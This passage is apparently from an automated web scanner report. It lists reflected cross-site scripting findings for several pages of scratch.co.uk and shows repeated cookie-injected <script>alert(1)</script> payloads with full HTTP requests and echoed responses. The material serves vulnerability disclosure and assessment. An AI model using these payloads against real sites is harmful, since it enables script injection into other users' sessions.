The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88308"><script>alert(1)</script>3161139aaf8 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /help/privacy/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG88308"><script>alert(1)</script>3161139aaf8; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:36 GMT; path=/
Set-Cookie: lang=ENG88308%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3161139aaf8; expires=Wed, 15-Jun-2011 12:29:36 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:36 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:36 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 16996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG88308"><script>alert(1)</script>3161139aaf8', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.172. http://scratch.co.uk/invite-friend/ [affiliate cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /invite-friend/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cef2"><script>alert(1)</script>2ddcfdeb17b was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /invite-friend/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C2437cef2"><script>alert(1)</script>2ddcfdeb17b; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C2437cef2%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2ddcfdeb17b; expires=Wed, 15-Jun-2011 12:25:37 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:37 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:37 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:37 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 15141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|2437cef2"><script>alert(1)</script>2ddcfdeb17b');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.173. http://scratch.co.uk/invite-friend/ [currency cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /invite-friend/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0b24"><script>alert(1)</script>331cb5603ba was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /invite-friend/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBPd0b24"><script>alert(1)</script>331cb5603ba;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:33 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:29:33 GMT; path=/
Set-Cookie: currency=GBPd0b24%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E331cb5603ba; expires=Wed, 15-Jun-2011 12:29:33 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:33 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 15139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBPd0b24"><script>alert(1)</script>331cb5603ba', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.174. http://scratch.co.uk/invite-friend/ [lang cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /invite-friend/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61860"><script>alert(1)</script>93ea94dc415 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /invite-friend/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG61860"><script>alert(1)</script>93ea94dc415; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:28:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:28:50 GMT; path=/
Set-Cookie: lang=ENG61860%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E93ea94dc415; expires=Wed, 15-Jun-2011 12:28:50 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:28:50 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:28:50 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG61860"><script>alert(1)</script>93ea94dc415', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.175. http://scratch.co.uk/over-18/ [affiliate cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /over-18/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94275"><script>alert(1)</script>11d8ef5060b was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /over-18/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C24394275"><script>alert(1)</script>11d8ef5060b; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C24394275%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E11d8ef5060b; expires=Wed, 15-Jun-2011 12:26:12 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:12 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:12 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:12 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 10735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|24394275"><script>alert(1)</script>11d8ef5060b');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.176. http://scratch.co.uk/over-18/ [currency cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /over-18/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a5e9"><script>alert(1)</script>657c0e10aea was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /over-18/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP3a5e9"><script>alert(1)</script>657c0e10aea;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:44 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:44 GMT; path=/
Set-Cookie: currency=GBP3a5e9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E657c0e10aea; expires=Wed, 15-Jun-2011 12:30:44 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:44 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 10733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP3a5e9"><script>alert(1)</script>657c0e10aea', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.177. http://scratch.co.uk/over-18/ [lang cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /over-18/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2f0a"><script>alert(1)</script>260d517347e was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /over-18/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENGb2f0a"><script>alert(1)</script>260d517347e; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: lang=ENGb2f0a%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E260d517347e; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:30:01 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:01 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 10735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENGb2f0a"><script>alert(1)</script>260d517347e', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.178. http://scratch.co.uk/problem-gambling/ [affiliate cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /problem-gambling/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 394d5"><script>alert(1)</script>18bf32caf70 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /problem-gambling/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243394d5"><script>alert(1)</script>18bf32caf70; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243394d5%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E18bf32caf70; expires=Wed, 15-Jun-2011 12:26:06 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:06 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:06 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:06 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243394d5"><script>alert(1)</script>18bf32caf70');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.179. http://scratch.co.uk/problem-gambling/ [currency cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /problem-gambling/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46cdc"><script>alert(1)</script>71a5e08c364 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /problem-gambling/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP46cdc"><script>alert(1)</script>71a5e08c364;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:30:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:30:39 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:30:39 GMT; path=/
Set-Cookie: currency=GBP46cdc%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E71a5e08c364; expires=Wed, 15-Jun-2011 12:30:39 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:30:39 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP46cdc"><script>alert(1)</script>71a5e08c364', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.180. http://scratch.co.uk/problem-gambling/ [lang cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /problem-gambling/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c926"><script>alert(1)</script>9dd75eb04f8 was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /problem-gambling/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG6c926"><script>alert(1)</script>9dd75eb04f8; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:40 GMT; path=/
Set-Cookie: lang=ENG6c926%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9dd75eb04f8; expires=Wed, 15-Jun-2011 12:29:40 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:29:40 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:40 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG6c926"><script>alert(1)</script>9dd75eb04f8', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.181. http://scratch.co.uk/promotions/ [affiliate cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /promotions/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a0e9"><script>alert(1)</script>086149d4525 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /promotions/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C2433a0e9"><script>alert(1)</script>086149d4525; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C2433a0e9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E086149d4525; expires=Wed, 15-Jun-2011 12:25:32 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:32 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:25:32 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:32 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|2433a0e9"><script>alert(1)</script>086149d4525');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.182. http://scratch.co.uk/promotions/ [currency cookie]  previous  next

Summary

Severity:   Information